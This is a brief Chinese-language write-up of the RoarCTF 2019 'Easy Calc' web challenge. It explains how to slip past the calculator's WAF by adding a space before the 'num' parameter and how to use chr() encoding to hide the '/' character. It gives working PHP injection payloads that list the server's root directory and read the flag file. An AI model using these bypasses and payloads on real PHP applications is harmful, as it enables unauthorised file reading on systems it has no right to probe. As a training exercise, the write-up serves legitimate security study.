RoarCTF 2019]Easy Calc

scandir() 函数 返回指定目录中的文件和目录的数组。

var_dump() 函数用于输出变量的相关信息。

var_dump() 函数显示关于一个或多个表达式的结构信息，包括表达式的类型与值。数组将递归展开值，通过缩进显示其结构。

file_get_contents — 将整个文件读入一个字符串

 

点开后发现是一个计算器，而且过滤了很多东西，查看源码发现了新东西

直接在网址加上calc.php?num=1，显示1，但是输入字母a就会报错

那么我们可以在num前加个空格：
http://www.xxx.com/index.php? num = aaaa
这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。

首先我们要先扫根目录下的所有文件，也就是是scandir("/"),但是“/”被过滤了，所以我们用chr(“47”)绕过,发现flagg文件

playload：    ? num=1;var_dump(scandir(chr(47)));

然后直接：? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103));

就可得到flag

当然也有一种HTTP走私的方法，但是很复杂，想学的可以去了解一些